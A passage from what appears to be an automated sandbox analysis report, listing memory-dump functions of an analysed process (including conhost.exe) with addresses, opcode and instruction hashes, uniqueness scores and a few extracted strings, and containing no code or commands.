Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7cc2577d7c81ce9a6282a9a0a384ee884bb820be0d92c0b63d2d2e095bf5f05
Instruction ID: ac9086a0670bb06387e243a945b0a0a82e96ec873d7d81474fac2ed947bf73cf
Opcode Fuzzy Hash: e7cc2577d7c81ce9a6282a9a0a384ee884bb820be0d92c0b63d2d2e095bf5f05
Instruction Fuzzy Hash: 3B01A172D0850B8EEB269B48C855AFD73E1FF56714F148579D00E922D5CE7A2540E741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C503B1, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.736354515.00007FFA35C40000.00000040.00000001.sdmp, Offset: 00007FFA35C40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 525977a320534b4d4154277990823fba12f7d8fbfe285ef816e00f1375f8c159
Instruction ID: 5b3f2f520781c6f68edecd3aead9ff1008b736605b5ca60580d4ae5b9e1b3caa
Opcode Fuzzy Hash: 525977a320534b4d4154277990823fba12f7d8fbfe285ef816e00f1375f8c159
Instruction Fuzzy Hash: 4D01A271C0C68A8FDB65DFA848592A87FE0FF16705F4446FAE50CD6192DF395444C741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C52E5D, Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.736354515.00007FFA35C40000.00000040.00000001.sdmp, Offset: 00007FFA35C40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5f5718cc10f6842e17a5484408a1b6e50f67a8a154e4acdd3653cd94500dcce
Instruction ID: 4cc8aad5ef36b27a278f7ff4cecf7008026b1371e3c1dda76e2b83a075cb8f60
Opcode Fuzzy Hash: e5f5718cc10f6842e17a5484408a1b6e50f67a8a154e4acdd3653cd94500dcce
Instruction Fuzzy Hash: 7101A271D18A0E9FEB80DFACC8545A877F1FF2A705F404579E00DD7282CE3598069740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C47371, Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.736354515.00007FFA35C40000.00000040.00000001.sdmp, Offset: 00007FFA35C40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4c35a57829916c9618ce714f38fb387f0b1dc8ea427eda3994fd6586916ceec
Instruction ID: 891c1b18bd1a2b70fa8835dfba2f386658f4d396cee83d2d91e85bee692f589d
Opcode Fuzzy Hash: d4c35a57829916c9618ce714f38fb387f0b1dc8ea427eda3994fd6586916ceec
Instruction Fuzzy Hash: B0014F7190868D8FDB95EF18C889AA97FE0FF69304F0545A6E818C7162DA35D590CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C52B31, Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.736354515.00007FFA35C40000.00000040.00000001.sdmp, Offset: 00007FFA35C40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b32a73e04ac11098ea4764b16d36566bb56ea6d1d3706b6c99eac1456c8a4e7
Instruction ID: 6563f97dbd486b900b7fdb083b66b1b989590001d1052fafecb2211e812009df
Opcode Fuzzy Hash: 7b32a73e04ac11098ea4764b16d36566bb56ea6d1d3706b6c99eac1456c8a4e7
Instruction Fuzzy Hash: 02F02232C5C68A8FEB51AF688C095F97FE4EF06305F0448B6E81CC3092DE7862508781

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C53838, Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.736354515.00007FFA35C40000.00000040.00000001.sdmp, Offset: 00007FFA35C40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90aa40b827dc2c5aec2fd21824f17052771fd1b64affc3fabeb3118be656d7e1
Instruction ID: 5a2eb44d29e9c95022de76ce32f11c26895adf757f1405682ef28783979c645e
Opcode Fuzzy Hash: 90aa40b827dc2c5aec2fd21824f17052771fd1b64affc3fabeb3118be656d7e1
Instruction Fuzzy Hash: 8A011A72A0850BCFEB58EF88C8969FE73A1FB55B15F104636D40DD3295CE39A841DB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C50EF5, Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.736354515.00007FFA35C40000.00000040.00000001.sdmp, Offset: 00007FFA35C40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77f3e8c371e3e158066981ad34cbd1ad6b72090b45a20e302f7e0dbaada677a9
Instruction ID: 1b931a5cc520a347272933efdea771ba614b64fb382e0e5b8e0d38f0af631b1b
Opcode Fuzzy Hash: 77f3e8c371e3e158066981ad34cbd1ad6b72090b45a20e302f7e0dbaada677a9
Instruction Fuzzy Hash: F8F0D13180C68A8FEB54EF68881A2A97BE0EF16205F4186BAE40CD2192DE286540C701

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C505C1, Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.736354515.00007FFA35C40000.00000040.00000001.sdmp, Offset: 00007FFA35C40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8ca822a2106231b2567f29f83d12dc2203402f6eb4ace98fff495d101a2dda6
Instruction ID: 19fda76a276e177a0180d62c205cbf0e9686edee06de6fcba731f1d404087364
Opcode Fuzzy Hash: d8ca822a2106231b2567f29f83d12dc2203402f6eb4ace98fff495d101a2dda6
Instruction Fuzzy Hash: B8F0C862C0C68E8FE755ABA8482A2F97FE0EF16705F8489B6E40CD6093ED2A5144D741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C48842, Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.736354515.00007FFA35C40000.00000040.00000001.sdmp, Offset: 00007FFA35C40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79b2ff219ab058db60ab7f8b36c73895b303150ed3b7a6e6aa31acda1e08f715
Instruction ID: 3152b2506196bcedeaf3214cd112a534499d613950185832c071a1d9b07b8c6b
Opcode Fuzzy Hash: 79b2ff219ab058db60ab7f8b36c73895b303150ed3b7a6e6aa31acda1e08f715
Instruction Fuzzy Hash: BCF0C27190850E8FEB50DF9C98492EEB7E0FF19305F1045B2E40DD2060DE306691CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C47FD1, Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.736354515.00007FFA35C40000.00000040.00000001.sdmp, Offset: 00007FFA35C40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94d037756f394b3053c0593c11d5877b40d041121037c5172a24b91ec839b917
Instruction ID: 25ecd54aa619b2829455e9d9f7a97c3a5dea1564f4d16d4fc7527b56e30835b1
Opcode Fuzzy Hash: 94d037756f394b3053c0593c11d5877b40d041121037c5172a24b91ec839b917
Instruction Fuzzy Hash: FCF06DB5D0460A8FEB54DB48D855BB977B1FF46310F00817AD40EE7291DE792A42CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C50AAD, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.736354515.00007FFA35C40000.00000040.00000001.sdmp, Offset: 00007FFA35C40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4eec9f1d31f79743452e963b306180793e9dea83aee672b63735ba583321a583
Instruction ID: dcbe9854d9c9be94cfb307e40e7282ece0bc2537954d5db0243c145ab19f6062
Opcode Fuzzy Hash: 4eec9f1d31f79743452e963b306180793e9dea83aee672b63735ba583321a583
Instruction Fuzzy Hash: 3EF04622C0C38A8FE765ABAC485A2F97FE0EF16704F4489F6D00CC64D3DD685080C742

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C47E46, Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.736354515.00007FFA35C40000.00000040.00000001.sdmp, Offset: 00007FFA35C40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53a0623aa871988bb8941b2c32cc3652a2ada6fd0ac5628ef2b6a2f7a7157c15
Instruction ID: 72b5dd13221fc327240f3969b496b4e19a1e2332f7a007cd1d4b5ed4d7c48f73
Opcode Fuzzy Hash: 53a0623aa871988bb8941b2c32cc3652a2ada6fd0ac5628ef2b6a2f7a7157c15
Instruction Fuzzy Hash: 8DF031B590850B8FEB0ADF48C451EBD77E1AF56304F41406EC40ADB391DE7A1945DF51

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C4B54D, Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.736354515.00007FFA35C40000.00000040.00000001.sdmp, Offset: 00007FFA35C40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 515cc16d85c7eba7b6357e7b9aa27e5427265b484095a489e7c1977f8ad82c10
Instruction ID: 28bb045a850e480b286864ad531fa1975d760420440eb1ddb25f8948c4a54505
Opcode Fuzzy Hash: 515cc16d85c7eba7b6357e7b9aa27e5427265b484095a489e7c1977f8ad82c10
Instruction Fuzzy Hash: E1F0C8B2C0C78A8FEB669F6C481A6B8BFE0EF16708F4585F7D40CC6093DD2950448741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C408E0, Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.736354515.00007FFA35C40000.00000040.00000001.sdmp, Offset: 00007FFA35C40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b3ae290bdd56673aa00fc9deb3a09b749980a058233f0cd01a2a7880a2a32fd
Instruction ID: b310100f59436476d40735c60e9c4d00c1acf7b13f939ea0f328618b42f65c4d
Opcode Fuzzy Hash: 1b3ae290bdd56673aa00fc9deb3a09b749980a058233f0cd01a2a7880a2a32fd
Instruction Fuzzy Hash: 12F02462C9C68E4EF7629B2C980ABFC7BE0EB16708F404576D44DD6092CE751690C381

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C40A79, Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.736354515.00007FFA35C40000.00000040.00000001.sdmp, Offset: 00007FFA35C40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 882e1adf1cc36cff689ed60992506c972c6325cad98ff809cd182fb8543a35f6
Instruction ID: 44981500141ddee40c44a044fa790494a1cba84b6c5120dbe0f4c9fcab80a67d
Opcode Fuzzy Hash: 882e1adf1cc36cff689ed60992506c972c6325cad98ff809cd182fb8543a35f6
Instruction Fuzzy Hash: A2F0CDB2C4D38A8FDB569F28884AAE97FB0EF06304F4440A7D50CDA092DA389544C741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C4B970, Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.736354515.00007FFA35C40000.00000040.00000001.sdmp, Offset: 00007FFA35C40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7d5d7074c31d776818a19931b06fdc637f3be32853f17b71a0b741e55920163
Instruction ID: 1b850f2c61779f70a8591734846963584e521956422fe77de105d182b89cf9f8
Opcode Fuzzy Hash: a7d5d7074c31d776818a19931b06fdc637f3be32853f17b71a0b741e55920163
Instruction Fuzzy Hash: 99F0907581864E8EEB65AF68880A6F977E0FF19308F4085BAE81CC2192DE356590C782

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C503D0, Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.736354515.00007FFA35C40000.00000040.00000001.sdmp, Offset: 00007FFA35C40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cbd18f6a801dd4eeeafb6c04c2e0e212c56330c9d5d2da779074386eb1ece1a
Instruction ID: b3727a75fccc2c0b8ea4302bbb61fd5900b3e00b716f8218be3779e923ec669e
Opcode Fuzzy Hash: 3cbd18f6a801dd4eeeafb6c04c2e0e212c56330c9d5d2da779074386eb1ece1a
Instruction Fuzzy Hash: 95F09031818A4E8FEB95EFA888192F977E0FF15309F4049BAE40DD2191DE356154C741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C47B20, Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.736354515.00007FFA35C40000.00000040.00000001.sdmp, Offset: 00007FFA35C40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55b86e20f32a024dbc7ba1071d7453657e483dd2cd043b99e5fad81848e216f2
Instruction ID: 44767f8ff9e7977f468b2ac91af774ab53b1d788ca56351a344a97c42951b357
Opcode Fuzzy Hash: 55b86e20f32a024dbc7ba1071d7453657e483dd2cd043b99e5fad81848e216f2
Instruction Fuzzy Hash: 56F0307181850E9FDB50EF6884496BE7BE1FF55305F504476E40DD2150DA35A190DB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C50360, Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.736354515.00007FFA35C40000.00000040.00000001.sdmp, Offset: 00007FFA35C40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc5fb69ae35569d7cf8a3fceae2d59298aadbeb8a83909d52b126862a1ff3882
Instruction ID: 122197cc2d06223b4d2e20136f83b54f7828575706ece5b8b5c2e6e620bd5b47
Opcode Fuzzy Hash: fc5fb69ae35569d7cf8a3fceae2d59298aadbeb8a83909d52b126862a1ff3882
Instruction Fuzzy Hash: 49F0BE3580864ECFDB68DFA888012F977E0BF02305F4089BAF41CC21C2CE39A654D741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C52F99, Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.736354515.00007FFA35C40000.00000040.00000001.sdmp, Offset: 00007FFA35C40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b881bb9f038c0996832b6512bd7a4b5101dd6f80fe45afef2675511a31f6aebd
Instruction ID: f21fc274cab77d7ee96f1feaa1a9fb679d0045df18f205f78414bb5900c02bbb
Opcode Fuzzy Hash: b881bb9f038c0996832b6512bd7a4b5101dd6f80fe45afef2675511a31f6aebd
Instruction Fuzzy Hash: 71F0273180D3C98FD3225B248C110E43FA0AF03300F0946F6F44C460E3DE295818C351

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C47958, Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.736354515.00007FFA35C40000.00000040.00000001.sdmp, Offset: 00007FFA35C40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 472c31109164ab55ffabef3d64f1f9d80ec8dde0535d19a818d031ff199b33de
Instruction ID: bd002b42252580ff18e97a45c1f3c3073b92030d653cf07f9d35cf274e55cdee
Opcode Fuzzy Hash: 472c31109164ab55ffabef3d64f1f9d80ec8dde0535d19a818d031ff199b33de
Instruction Fuzzy Hash: CCF06531C1850E9FEB50EF6888086FDB7E4FF09305F404876E81DC2191EE746150C741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C40A3B, Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.736354515.00007FFA35C40000.00000040.00000001.sdmp, Offset: 00007FFA35C40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aba36d1c94fd545414635b3013c3855807b662d0cd2ba0c55fc956ea7c21f79e
Instruction ID: 70fc613ca5b9ffbf3daaf699e23a04f23013ecd50b5c5cf5301c2f6ffb92e1ad
Opcode Fuzzy Hash: aba36d1c94fd545414635b3013c3855807b662d0cd2ba0c55fc956ea7c21f79e
Instruction Fuzzy Hash: C5E09231C9D50E9EEB50FB68840D5FDB6E4FF05304F005872E40DD1040DD3462948701

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C406AE, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.736354515.00007FFA35C40000.00000040.00000001.sdmp, Offset: 00007FFA35C40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9cd39b7db9c7d511f170e24103ec541e5676092262944edb0d5c2299bd23ed19
Instruction ID: 1fa153fb68eec265f9b469455453afa61491e4e71f6e047e72fdca230864efb3
Opcode Fuzzy Hash: 9cd39b7db9c7d511f170e24103ec541e5676092262944edb0d5c2299bd23ed19
Instruction Fuzzy Hash: E1E0C27194801BCFEF01DB08C845AED73A0FB95725F008221C80ABA285DF3C60448F44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C48340, Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.736354515.00007FFA35C40000.00000040.00000001.sdmp, Offset: 00007FFA35C40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff7e91602731168bd095f5b145db0ffddc8fce3a2772e9b3d9b74c0d0399e01c
Instruction ID: b019b9250a433dcdea57697af3a07ef728387f07d55487f2c72397f305de5075
Opcode Fuzzy Hash: ff7e91602731168bd095f5b145db0ffddc8fce3a2772e9b3d9b74c0d0399e01c
Instruction Fuzzy Hash: 6DC08CE1C0C1078FF3068B5CC011E7E27E15F12308F01446AC00D8B2D2DE2E294AAB81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C48175, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.736354515.00007FFA35C40000.00000040.00000001.sdmp, Offset: 00007FFA35C40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f894f9e905f04f185bd7ab5125883a8f5b1a646a02220b95904ae4643de7f5b
Instruction ID: 4786427d0d1f998a0ec2eebd54215b6f83fef8f6549b13ee8c1c4d3afb69d62d
Opcode Fuzzy Hash: 5f894f9e905f04f185bd7ab5125883a8f5b1a646a02220b95904ae4643de7f5b
Instruction Fuzzy Hash: F1B012B1C0C10B48FB2917584003EFE10900F01708E008439800F000C1CD7ED1033A40

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FFA35C40B8C, Relevance: 6.5, Strings: 5, Instructions: 211COMMON

Download Yara Rule

Strings

a\:, xrefs: 00007FFA35C40B9F
(b\:, xrefs: 00007FFA35C40C25
a\:, xrefs: 00007FFA35C40BD5
0b\:, xrefs: 00007FFA35C40C4D
b\:, xrefs: 00007FFA35C40C8B

Memory Dump Source

Source File: 00000015.00000002.736354515.00007FFA35C40000.00000040.00000001.sdmp, Offset: 00007FFA35C40000, based on PE: false

Similarity

API ID:
String ID: b\:$(b\:$0b\:$a\:$a\:
API String ID: 0-2057431078
Opcode ID: b09c0122fb36c99873bb26d9a23059b473bafff4ce41f82018dfe0ee3ac98295
Instruction ID: 9a854c0e87f42c2a8b416374f816ff117f6015f3fbb095cbfe13ff764212cc2d
Opcode Fuzzy Hash: b09c0122fb36c99873bb26d9a23059b473bafff4ce41f82018dfe0ee3ac98295
Instruction Fuzzy Hash: F56102B1909B8D8EE34ADBA898553A8BFE1FF27314F5001BAC00CDB693EE691804C741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C47F1D, Relevance: 5.1, Strings: 4, Instructions: 71COMMON

Download Yara Rule

Strings

H\\:, xrefs: 00007FFA35C48307
0\\:, xrefs: 00007FFA35C482E0
@\\:, xrefs: 00007FFA35C482FA
8\\:, xrefs: 00007FFA35C482ED

Memory Dump Source

Source File: 00000015.00000002.736354515.00007FFA35C40000.00000040.00000001.sdmp, Offset: 00007FFA35C40000, based on PE: false

Similarity

API ID:
String ID: 0\\:$8\\:$@\\:$H\\:
API String ID: 0-1131623920
Opcode ID: 1082cd02f363ad74561a5338a12a62e82e59c779330fdeaca080ad3e4308985a
Instruction ID: 80622f22801f87af7bbadb89e8682522ea62ec59a2ae20cde3df10166a988f66
Opcode Fuzzy Hash: 1082cd02f363ad74561a5338a12a62e82e59c779330fdeaca080ad3e4308985a
Instruction Fuzzy Hash: 5E21A1B2D0860E8FEB5ADB48C451AB877F1EF56304F5040AAC40DEB292DE2A2946CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C4828F, Relevance: 5.1, Strings: 4, Instructions: 70COMMON

Download Yara Rule

Strings

H\\:, xrefs: 00007FFA35C48307
0\\:, xrefs: 00007FFA35C482E0
@\\:, xrefs: 00007FFA35C482FA
8\\:, xrefs: 00007FFA35C482ED

Memory Dump Source

Source File: 00000015.00000002.736354515.00007FFA35C40000.00000040.00000001.sdmp, Offset: 00007FFA35C40000, based on PE: false

Similarity

API ID:
String ID: 0\\:$8\\:$@\\:$H\\:
API String ID: 0-1131623920
Opcode ID: f2e770a0c3e1dbadf7d8b61c68c599745bfc9ab16071e79e25c8a8eb36eb9fa5
Instruction ID: 8e2d246c1c79789f6f8ca7b2f5d5c96327d5f9800b7c7169b848c3340f45f0e2
Opcode Fuzzy Hash: f2e770a0c3e1dbadf7d8b61c68c599745bfc9ab16071e79e25c8a8eb36eb9fa5
Instruction Fuzzy Hash: 1621AEB1D0825A8FDB0ADF98C490ABC77F1EF16304F40416EC00ADB282DE396A45CB00

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: conhost.exe PID: 7052 Parent PID: 968 conhost.exeCOMMON

Executed Functions

Function 00007FFA35C2893F, Relevance: 1.3, Strings: 1, Instructions: 85COMMON

Download Yara Rule

Strings

[ , xrefs: 00007FFA35C2899E, 00007FFA35C289CB

Memory Dump Source

Source File: 0000001C.00000002.743465008.00007FFA35C20000.00000040.00000001.sdmp, Offset: 00007FFA35C20000, based on PE: false

Similarity

API ID:
String ID: [
API String ID: 0-2249208011
Opcode ID: 7aa91566bc8d5c39692ded5e708b252800040d837816285170418bd9a19dfa7e
Instruction ID: adce7dc2d8661d2b7ec73e9156d25869698dbf90445e3250543534738c6f4448
Opcode Fuzzy Hash: 7aa91566bc8d5c39692ded5e708b252800040d837816285170418bd9a19dfa7e
Instruction Fuzzy Hash: 73316BB2D0835B8EEF15ABA8A8452BD7AF0BF16718F0085BAD04DE71C3CE792504D791

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C28798, Relevance: .3, Instructions: 277COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.743465008.00007FFA35C20000.00000040.00000001.sdmp, Offset: 00007FFA35C20000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d892acf15907f1ccca6404c69bbb8aa86f04697900721b2e13f79450a8fbf45
Instruction ID: 7689593c811f81e4b5cd5864e008848b37675946de1ba1232eb805616d6fed0c
Opcode Fuzzy Hash: 5d892acf15907f1ccca6404c69bbb8aa86f04697900721b2e13f79450a8fbf45
Instruction Fuzzy Hash: 00A1FD75908A4E8FDB98EF58C494AB9B7B1FF55704F504079E40ED7295CF36A882CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C26FCB, Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.743465008.00007FFA35C20000.00000040.00000001.sdmp, Offset: 00007FFA35C20000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f3647ceb0d69df2b8af4d34266818fd2ef897417f384b4c0906d5731b9ac83e
Instruction ID: e04b81da1b8eaa8a5864fe318aa461136cc9f109a89a6e7b41b55686437c3382
Opcode Fuzzy Hash: 5f3647ceb0d69df2b8af4d34266818fd2ef897417f384b4c0906d5731b9ac83e
Instruction Fuzzy Hash: 83A1ACA284E3C24FD7038B749C696953FB0AF23218B0F86DBC4C5CF4A3E2195959D722

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C2C6BC, Relevance: .2, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.743465008.00007FFA35C20000.00000040.00000001.sdmp, Offset: 00007FFA35C20000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82266ef2a918dba2f061c1532cf0e8db3b5336c97ec24bc2315c21b47ca2f93d
Instruction ID: 79c227ee3bcf6e882623f2a6a0774454812cad06f30d2c1ffb932231eb566696
Opcode Fuzzy Hash: 82266ef2a918dba2f061c1532cf0e8db3b5336c97ec24bc2315c21b47ca2f93d
Instruction Fuzzy Hash: 8D517F31918A1C8FDB68DF58D845BE9BBF1FB59710F1082AAD00DE3252DE34A9858F81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C2B5BB, Relevance: .2, Instructions: 177COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.743465008.00007FFA35C20000.00000040.00000001.sdmp, Offset: 00007FFA35C20000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47730ce1c44cef2e23796d1464e56c1e3a4909b461d1926c58fb32ed8085b68a
Instruction ID: 8cb5757f4cb7837e5c97a8c25e24ec9853e23104fb9ddbf7e82b84352c848e2b
Opcode Fuzzy Hash: 47730ce1c44cef2e23796d1464e56c1e3a4909b461d1926c58fb32ed8085b68a
Instruction Fuzzy Hash: EA511671D08A1A8EEF54DB58A8556BDB7F1EF5AB08F50817AD00DE3292CE3968809B50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C278B0, Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.743465008.00007FFA35C20000.00000040.00000001.sdmp, Offset: 00007FFA35C20000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf5aa4d6d5c29251c62e743b42d7af7a233b6ca06d1fb1d7a6e3c1f6d39435d3
Instruction ID: 40f683e8de87daa3dde3958a26cbf3c1cb2602199a8e2f90e2c0fcd7f25408f1
Opcode Fuzzy Hash: cf5aa4d6d5c29251c62e743b42d7af7a233b6ca06d1fb1d7a6e3c1f6d39435d3
Instruction Fuzzy Hash: 3F41D072D08A8E8FEB58EB5CC855ABD7BF1EF6A715F44407AE00DE3291CF2968408740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C28778, Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.743465008.00007FFA35C20000.00000040.00000001.sdmp, Offset: 00007FFA35C20000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b39b9cf7249665aec895957ca9adb16e11637d02b41a89873223c5190e262c8
Instruction ID: 0cc475fd92161455ca8634efc40b4059a8773de5c5d1b2dcbf6e3c909342a0e3
Opcode Fuzzy Hash: 1b39b9cf7249665aec895957ca9adb16e11637d02b41a89873223c5190e262c8
Instruction Fuzzy Hash: 6031C436A0890E8FDB94EB5CD8066FA77A1FF49714F00417AE00DD3196CE3AA846CBC0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C20565, Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.743465008.00007FFA35C20000.00000040.00000001.sdmp, Offset: 00007FFA35C20000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b8f5f8b6003a68dce25c4512b349ca4a337664e3cabf0c29c482dd74324d4ff
Instruction ID: e573d9cca6468facac7ee8d3cd201a79ae2c791e90a9e1ba3ce8d040093999f0
Opcode Fuzzy Hash: 3b8f5f8b6003a68dce25c4512b349ca4a337664e3cabf0c29c482dd74324d4ff
Instruction Fuzzy Hash: AE417772C0861B8FEF04DB58D8046AEBAB1AF9A715F10817AD40CB6286DF395448DB65

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C2B133, Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.743465008.00007FFA35C20000.00000040.00000001.sdmp, Offset: 00007FFA35C20000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df395b3b9ef2a4899e2e2eec3f132106d2c7d738870d9dec118b878be9525036
Instruction ID: f8ae29478882675bea7c321e38c2d81ec3ba6e107adea15ad17b6c21f9adc8b7
Opcode Fuzzy Hash: df395b3b9ef2a4899e2e2eec3f132106d2c7d738870d9dec118b878be9525036
Instruction Fuzzy Hash: D6315C3690CA4A8FEF98EB58D8556F9BBB1FF56718F14817AD00DC7192CE296842CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C20AE4, Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.743465008.00007FFA35C20000.00000040.00000001.sdmp, Offset: 00007FFA35C20000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f282f0a70b7653e56390fbb3b6ea3a5e9a51cae0cf6086f79c6321497cf29f85
Instruction ID: c59ff666642fa12dbb8ffe955fcc2bf817eb7a153393d30e1cdd727b56744fed
Opcode Fuzzy Hash: f282f0a70b7653e56390fbb3b6ea3a5e9a51cae0cf6086f79c6321497cf29f85
Instruction Fuzzy Hash: 88319C7291D68E8FEBA5DB2C98556F8BFF0EF1A714F4441BBD40CE31A2DE2958019701

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C31D70, Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.743465008.00007FFA35C20000.00000040.00000001.sdmp, Offset: 00007FFA35C20000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d217bded0641af2af8f65b3a05a41fa8de70f768a16513999fc068eb82a58315
